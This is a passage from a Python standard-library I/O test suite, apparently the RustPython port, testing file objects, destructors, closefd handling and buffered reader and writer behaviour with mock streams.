self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os_helper.TESTFN.encode('utf-8')))
with self.open(os_helper.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
# TODO: RUSTPYTHON, AssertionError: filter ('', ResourceWarning) did not catch any warning
@unittest.expectedFailure
def test_destructor(self):
super().test_destructor(self)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
